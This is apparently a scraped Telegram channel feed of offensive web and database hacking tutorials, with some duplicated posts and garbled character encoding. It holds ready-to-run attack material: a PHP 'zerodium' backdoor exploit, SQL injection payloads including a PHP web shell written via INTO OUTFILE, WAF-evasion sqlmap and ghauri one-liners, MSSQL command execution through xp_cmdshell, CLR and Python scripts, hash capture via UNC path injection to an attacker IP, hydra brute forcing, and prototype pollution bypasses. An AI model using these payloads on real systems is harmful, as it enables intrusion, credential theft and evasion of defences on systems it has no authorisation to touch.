How do hackers find hidden pages on your site?
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
๐ Examples of use:
โข Fuzzing with custom headers:
โข Recursive Fuzzing with Specific Depth:
โข Targeting specific patterns in responses:
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
๐ Examples of use:
โข Fuzzing with custom headers:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"
โข Recursive Fuzzing with Specific Depth:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2
โข Targeting specific patterns in responses:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
๐ฅ6๐1
PHP 8.1.0-dev RCE via User-Agentt Exploit
Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.
How Does the Vulnerability Work?
The vulnerability occurs when the application uses
$_SERVER['HTTP_USER_AGENTT']
unsafely, especially if the value is passed to functions like eval() or system().
If input validation is not implemented, attackers can execute unauthorized commands directly on the server.
Example of Vulnerable PHP Code
<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>
Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.
How to Exploit the Vulnerability
1. Testing Delay with sleep()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);
โขIf the response is delayed by 5 seconds, it confirms that the code is being executed successfully.
2. Executing a System Command
with system()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');
โขIf the server responds with user information such as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
โขthis means RCE exploitation is successful.
3. Executing PHP via phpinfo()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();
โขThis might display the current PHP configuration, which helps in understanding the target environment.
Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.
#ExploitQuest #ExploitQuest
@ExploitQuest
๐5โค1
Forwarded from Global Red Team
ุฃููุงู ูุณููุงู ุจูู
ุฌู
ูุนุงูุ
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@iiLinux
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@Egyshield
@GlobalRedTeam
@darkcsc
ูุฐู ู ุฌู ูุนุฉ ู ู ุงููููุงุช ุงูุฎุงุตุฉ ุจูุง ูุงูุชู ูุฏ ุชููุฏูู ุฎูุงู ุฑุญูุชูู ูู ุงูู ุฌุงู ุงูุชููู ูุฎุงุตุฉู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู.
@iiLinux
ููุงุฉ ุนุงู ุฉ ุชููู ุจูุดุฑ ุงูุชูููุงุช ุงูุนุงู ุฉ ู ุชุชู ูุฒ ุจุดุฑูุญุงุช ููููุณ.
@GlobalRedHat
ุงูู ุฌุชู ุน ุงูุฑุณู ู ูููุฑุงุตูุฉ ุฐูู ุงููุจุนุฉ ุงูุญู ุฑุงุก.
@k7ali_linux
ููุงุฉ ุชุฎุต ุดุฑูุญุงุช ูุงูู ููููุณ ุจุดูู ู ุฎุชูู ูู ุชู ูุฒ.
@ExploitQuest
ููุงุฉ ุชูุชู ุจุงูุชุดุงู ุงูุซุบุฑุงุช ู ุงุณุชุบูุงููุง ุจุงูุฅุถุงูุฉ ุฅูู ุงูุดุฑูุญุงุช ุงูู ู ูุฒุฉ ูููุง.@EgyptianshieldTOOLS
ููุงุฉ ุฎุงุตุฉ ุจุงูุฃุฏูุงุช ุงูู ุณุชุฎุฏู ุฉ ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.
@iiMrDark
ููุงุฉ ุชูุฏู ู ุญุชูู ุฎุงุต ุจุงูุชุณุฑูุจุงุช ูุงูุจุฑุงู ุฌ.
@Wa3i_Tech
ููุงุฉ ุชูุฏู ุงููุนู ูู ุงูุฃู ู ุงูุณูุจุฑุงูู ูุดุฑูุญุงุช ู ุจุณุทุฉ.
@codearabs
ููุงุฉ ู ุฎุชุตุฉ ุจุชุณุฑูุจ ููุฑุณุงุช ุงูุดุฑูุงุช ุงูู ุดููุฑุฉ ูู ุงูู ุฌุงูุงุช ุงูุชูููุฉ.
@Egyshield
ููุงุฉ ู ุฎุชุตุฉ ุจุงูุดุฑูุญุงุช ูุงูุฃุฎุจุงุฑ ุงูุชูููุฉ ูุชุญุฏูุฏุงู ูู ุงูุจุฑู ุฌุฉ ูุงูุฃู ู ุงูุณูุจุฑุงูู.
@GlobalRedTeam
ุงูู ุฌุชู ุน ุงูุฑุณู ู ููGlobal Red Team
@darkcsc
ููุงุฉ ุฎุงุตุฉ ุจุนูู ุงูุญุงุณูุจ ูุชุญุชูู ุนูู ุดุฑูุญุงุช ุชุฎุต ุงูุญุงุณูุจ ุจุดูู ุนุงู .
Forwarded from Global Red Hat
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
โโโโโโโโโโโโโโโโโโ
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
๐นMethod 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
โโโโโโโโโโโโโโโโโโ
๐นMethod 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
โโโโโโโโโโโโโโโโโโ
๐น Method 3: Using SQLMap for Automated Testing
๐น SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
โโโโโโโโโโโโโโโโโโ
๐นMethod 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
โโโโโโโโโโโโโโโโโโ
๐นMethod 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
โโโโโโโโโโโโโโโโโโ
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
๐นExample: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
๐นIf SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
โโโโโโโโโโโโโโโโโโ
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
๐ก Conclusion
โขTest manually using ' and OR 1=1
โขUse SQLMap for automatic SQLi detection
โขEscalate SQLi to RCE if the system allows file operations
โขTest SQL Sleep (Time-Based Injection) for hidden errors
โขUse UNION SELECT to extract sensitive data
โโโโโโโโโโโโโโโโโโ
๐ Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
Telegram
ExploitQuest
contact: @ExploitQuestbot
๐11โค6
This media is not supported in your browser
VIEW IN TELEGRAM
Today my birthday โค๏ธ
โค22๐ฅฐ4๐1
CORS one liner command exploiter
This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner
๐5๐5
Media is too big
VIEW IN TELEGRAM
"I discovered a vulnerability in a website that allowed me to escalate my privileges from a regular user to an admin. This privilege escalation granted me access to other users' data, the full database, and the admin control panel."
https://t.me/ExploitQuest
https://t.me/ExploitQuest
โค22๐คฏ10๐4๐ฅ3๐คท2
Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
โโโโโโโโโโโโโโโโโโ
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
โขDatabase credentials.
โขEnvironment variables.
โขFile paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
โโโโโโโโโโโโโโโโโโ
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
The server might respond with:
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
โโโโโโโโโโโโโโโโโโ
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
โขDatabase credentials.
โขEnvironment variables.
โขFile paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
โโโโโโโโโโโโโโโโโโ
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
๐5๐ฅ2โค1
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Hereโs an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
โโโโโโโโโโโโโโโโโโ
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
โโโโโโโโโโโโโโโโโโ
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
โขThe X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
โขModify headers like User-Agent to mimic real traffic.
โโโโโโโโโโโโโโโโโโ
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
โโโโโโโโโโโโโโโโโโ
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
โโโโโโโโโโโโโโโโโโ
Conclusion
โ Wayback Machine helps find old endpoints.
โ Manual payloads help confirm basic SQL injection.
โ Ghauri & SQLMap provide automation with WAF bypass techniques.
โโโโโโโโโโโโโโโโโโ
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Telegram
ExploitQuest
contact: @ExploitQuestbot
โค8๐2๐ฅ1
Here is a more optimized one-liner for finding SQL injection vulnerabilities while bypassing WAF efficiently:
More aggressive alternative for bypassing WAF with Tor and Hex encoding:
Try it and see the results!
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tamper="between,space2comment,charencode" --level=5 --risk=3 --batch --threads=10 --time-sec=5More aggressive alternative for bypassing WAF with Tor and Hex encoding:
gau target.com | grep '=' | anew urls.txt | httpx -silent -status-code -mc 200 | awk '{print $1}' | xargs -I{} sqlmap -u "{}" --random-agent --tor --proxy="socks5://127.0.0.1:9050" --tamper="space2comment,charencode,randomcase" --hex --batch --threads=5 --timeout=10Try it and see the results!
๐6๐3
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
โขThis query retrieves all archived URLs of example.com from Wayback Machine.
โข*.example.com/* searches for all subdomains and pages.
โขcollapse=urlkey removes duplicate URLs.
โขoutput=text formats the output as
plain text.
โขfl=original extracts only the original URLs without extra metadata.
โโโโโโโโโโโโโโโโโโ
Explanation:
โขRetrieves a security report for example.com from VirusTotal.
โขThis report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
โขReplace YOUR_API_KEY with a valid VirusTotal API key.
โโโโโโโโโโโโโโโโโโ
Explanation:
โขQueries AlienVault OTX for URLs associated with domain.com.
โขlimit=500 retrieves up to 500 URLs per page.
โขpage=1 fetches the first page of results.
โโโโโโโโโโโโโโโโโโ
Explanation:
โขFetches all archived URLs of example.com from Wayback Machine.
โขSaves the output to out.txt for further processing.
โโโโโโโโโโโโโโโโโโ
Explanation:
1-cat out.txt โ Reads the archived URLs from out.txt.
2-uro โ Deduplicates and normalizes URLs.
3-grep -E โ Uses regular expressions (regex) to extract potentially sensitive files, such as:
โขDatabase files: .sql, .db, .backup
โขDocuments: .xls, .xlsx, .doc, .pdf, .txt
โขCompressed archives: .zip, .tar.gz, .rar, .7z
โขEncryption keys: .pem, .crt, .key, .asc
โขConfiguration files: .config, .ini, .yaml, .yml
โขExecutable files: .exe, .dll, .apk, .msi
โโโโโโโโโโโโโโโโโโ
๐ Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1๏ธโฃ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
โขThis query retrieves all archived URLs of example.com from Wayback Machine.
โข*.example.com/* searches for all subdomains and pages.
โขcollapse=urlkey removes duplicate URLs.
โขoutput=text formats the output as
plain text.
โขfl=original extracts only the original URLs without extra metadata.
โโโโโโโโโโโโโโโโโโ
2๏ธโฃ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
โขRetrieves a security report for example.com from VirusTotal.
โขThis report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
โขReplace YOUR_API_KEY with a valid VirusTotal API key.
โโโโโโโโโโโโโโโโโโ
3๏ธโฃ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
โขQueries AlienVault OTX for URLs associated with domain.com.
โขlimit=500 retrieves up to 500 URLs per page.
โขpage=1 fetches the first page of results.
โโโโโโโโโโโโโโโโโโ
4๏ธโฃ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
โขFetches all archived URLs of example.com from Wayback Machine.
โขSaves the output to out.txt for further processing.
โโโโโโโโโโโโโโโโโโ
5๏ธโฃ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt โ Reads the archived URLs from out.txt.
2-uro โ Deduplicates and normalizes URLs.
3-grep -E โ Uses regular expressions (regex) to extract potentially sensitive files, such as:
โขDatabase files: .sql, .db, .backup
โขDocuments: .xls, .xlsx, .doc, .pdf, .txt
โขCompressed archives: .zip, .tar.gz, .rar, .7z
โขEncryption keys: .pem, .crt, .key, .asc
โขConfiguration files: .config, .ini, .yaml, .yml
โขExecutable files: .exe, .dll, .apk, .msi
โโโโโโโโโโโโโโโโโโ
๐ Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
โค6๐5
๐นMicrosoft SQL Server Abuse Techniques ๐น
๐ Hello, friends!
I often discuss Microsoft SQL Server (MSSQL) abuse in interviews, and surprisingly, many people have only a superficial understanding of it. However, MSSQL is widely used in corporate networks, and if misconfigured, it can become a valuable entry point for attackers.
In this post, I have gathered the main MSSQL abuse techniques to help you:
โ Understand possible attack vectors.
โ Prepare for interviews.
โ Organize your knowledge.
โโโโโโโโโโโโโโโโโโ
๐ MSSQL Basics
Microsoft SQL Server (MSSQL) is a relational database management system (DBMS) developed by Microsoft, commonly used in corporate environments for storing and processing data.
๐น Main Components:
โ Database Engine โ Stores, processes, and manages data.
โ SQL Server Agent โ Automates tasks (e.g., backups).
โ SQL Server Browser โ Helps clients find MSSQL instances.
โ SSIS (Integration Services) โ Handles data integration.
โ SSRS (Reporting Services) โ Generates reports.
โ SSAS (Analysis Services) โ Provides analytics and data processing.
๐น User Roles in MSSQL:
๐ธ sysadmin โ Full privileges on the server.
๐ธ db_owner โ Full rights within a specific database.
๐ธ db_datareader โ Read-only access.
๐ธ db_datawriter โ Ability to modify data.
๐ธ public โ Default role for all users (may have more permissions than expected).
๐น Authentication Methods:
๐น Windows Authentication โ Uses NTLM/Kerberos for domain-based authentication.
๐น SQL Authentication โ Uses local MSSQL accounts (e.g., sa, custom user logins).
๐ Detecting MSSQL on the Network
Before attacking, you must first locate MSSQL instances.
๐น PowerUpSQL (PowerShell)
Get-SQLInstanceDomain
๐น Nmap
nmap -p 1433 --script ms-sql-info <IP>
๐น Metasploit
use auxiliary/scanner/mssql/mssql_ping
๐น go-windapsearch
go-windapsearch -d domain.local -u Administrator -p 'password1111' -m custom --filter="(&(objectClass=computer)(servicePrincipalName=*MSSQLSvc/*))" --attrs cn,servicePrincipalName
๐ Gaining Access to MSSQL
๐น Brute Force Attack
hydra -L users.txt -P pass.txt <IP> mssql
netexec mssql <target-ip> -u username -p passwords.txt
โโโโโโโโโโโโโโโโโโ
๐ Privilege Escalation: Local Admin โ Sysadmin
The main MSSQL process (sqlservr.exe) runs under a Windows account with limited privileges, but inside SQL Server, it is often assigned sysadmin by default. Compromising this service can lead to full domain control!
๐น Step 1: Find Local MSSQL
Get-SQLInstanceLocal
๐น Step 2: Impersonate SQL Service Accounts
Invoke-SQLImpersonateService -Verbose -Instance your_instance_name
๐ฏ Executing OS Commands via MSSQL
If an attacker gains access to MSSQL, they can execute Windows commands using:
๐น CLR (Common Language Runtime) Assembly
Allows executing .NET code (C#, VB.NET) inside MSSQL.
Invoke-SQLOSCLR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
๐น OLE Automation Procedures
Allows running COM objects from T-SQL.
Invoke-SQLOSOle -Username sa -Password Pass123 -ServerInstance <IP> -Command "whoami"
๐น xp_cmdshell (Built-in Stored Procedure)
Executes Windows commands directly from MSSQL.
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Invoke-SQLOSCmd -Username sa -Password sa -Instance your_instance_name -Command "whoami"
โโโโโโโโโโโโโโโโโโ
๐ Conclusion
MSSQL misconfigurations can lead to serious security risks, including:
โ Unauthorized access to databases.
โ Privilege escalation to sysadmin.
โ Remote code execution (RCE).
โ Lateral movement across corporate networks.
๐ Understanding these techniques is essential for security professionals to prevent attacks and secure corporate environments. Stay safe! ๐
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
Telegram
ExploitQuest
contact: @ExploitQuestbot
๐8๐ฅ5
MSSQL Exploitation Techniques
๐น External Scripts (Python/R) โ Allows executing Python & R code in Microsoft SQL Server.
PowerUpSQL Commands:
๐น UNC Path Injection โ Extracts NetNTLM hashes via SMB.
PowerUpSQL Command:
๐น Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.
PowerUpSQL Commands:
#RedTeam #MSSQL #BugBounty #CyberSecurity
๐น External Scripts (Python/R) โ Allows executing Python & R code in Microsoft SQL Server.
-- Execute Python script
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
-- Execute R script
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe /c whoami",intern=T))'
WITH RESULT SETS (([cmd_out] text));
PowerUpSQL Commands:
# Remote Execution
Invoke-SQLOSCmdPython -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
Invoke-SQLOSCmdR -Username sa -Password Pass123 -Instance your_instance_name -Command "whoami"
# Local Execution
Get-SQLInstanceLocal | Invoke-SQLOSCmdPython -Verbose -Command "whoami"
Get-SQLInstanceLocal | Invoke-SQLOSCmdR -Verbose -Command "whoami"
๐น UNC Path Injection โ Extracts NetNTLM hashes via SMB.
EXEC xp_cmdshell 'net use Z:\\YOUR_IP\share';
PowerUpSQL Command:
Invoke-SQLUncPathInjection -Verbose -CaptureIp YourResponderHost
๐น Lateral Movement via Linked Servers
Linked Servers allow connections to other SQL Servers, MySQL, Oracle, PostgreSQL, and more.
-- List Linked Servers
EXEC sp_linkedservers;
-- Execute command on remote server
EXEC ('whoami') AT [LINKED_SERVER];
PowerUpSQL Commands:
# Find linked servers
Get-SQLServerLink -Instance YourInstance -Verbose
# Check privileges on remote server
Get-SQLServerLinkCrawl -Instance YourInstance -Verbose
# Enable xp_cmdshell on linked server
Get-SQLServerLinkCrawl -Instance YourInstance -Query "EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT YOUR_LINKED_SERVER"
๐ฅ That's all, friends!
Happy hacking and see you next time! ๐
#RedTeam #MSSQL #BugBounty #CyberSecurity
๐5โค4๐คฏ3
Prototype Pollution Vulnerability
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
โโโโโโโโโโโโโโโโโโ
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
To access properties of this object, we can use two methods:
1-Dot notation:
Bracket notation:
One of these methods is used for polluting the prototype of an object.
โโโโโโโโโโโโโโโโโโ
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
โขIf the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
Since "Arya" is a string, it inherits all properties from JavaScript's String prototype.
Using dot notation or bracket notation, we can see various inherited properties that were not explicitly defined.
Moreover, we can manually reference an object's prototype using:
If an attacker overwrites a property in a prototype that is being used in the frontend or backend of a web application, it can lead to serious security issues.
โโโโโโโโโโโโโโโโโโ
Testing for Prototype Pollution
To test for Prototype Pollution, modify the URL as follows and send a request:
1๏ธโฃ Dot Notation Approach
2๏ธโฃ Bracket Notation Approach
Bypassing WAF (Web Application Firewall)
If the WAF blocks the proto keyword, we can use constructor-based techniques:
If the WAF still blocks requests, we can use nested obfuscation techniques:
Confirming
the Vulnerability
To check if the property was successfully polluted, create an empty object in the browser console and try accessing the polluted property:
If the property value appears, the Prototype Pollution vulnerability exists on the target system.
โโโโโโโโโโโโโโโโโโ
[https://t.me/ExploitQuest]
#CyberSecurity #MSSQL #EthicalHacking
#PrototypePollution
#JavaScriptSecurity
#WebSecurity
#BugBounty
#EthicalHacking
#CyberSecurity
#SecurityResearch
#WebHacking
Prototype Pollution is a security vulnerability in JavaScript that allows an attacker to add arbitrary properties to the prototype (the root object) of a general object. This enables an attacker to modify object properties that would typically be inaccessible.
However, this vulnerability alone is not always exploitable. To increase its impact, an attacker often combines it with other vulnerabilities like Cross-Site Scripting (XSS) to execute malicious actions.
โโโโโโโโโโโโโโโโโโ
Understanding JavaScript Object Prototypes
In JavaScript, everything is an object. An object is essentially a collection of key-value pairs where values can be of any data type, such as boolean, string, integer, etc.
Creating an object in JavaScript is simple:
let userInfo = {
"username": "admin",
"password": "1qaz2wsx3edc",
"email": "admin@victim.com"
};To access properties of this object, we can use two methods:
1-Dot notation:
userInfo.username;
Bracket notation:
userInfo["username"];
One of these methods is used for polluting the prototype of an object.
โโโโโโโโโโโโโโโโโโ
How Prototype Pollution Works
When a property of an object is accessed, the JavaScript engine first looks for it inside the object itself.
โขIf the property does not exist in the object, JavaScript traverses up the prototype chain to find it in the parent prototype.
To better understand this, open the browser Console and create an object. JavaScript will automatically connect it to one of the built-in prototypes based on its type.
Example:
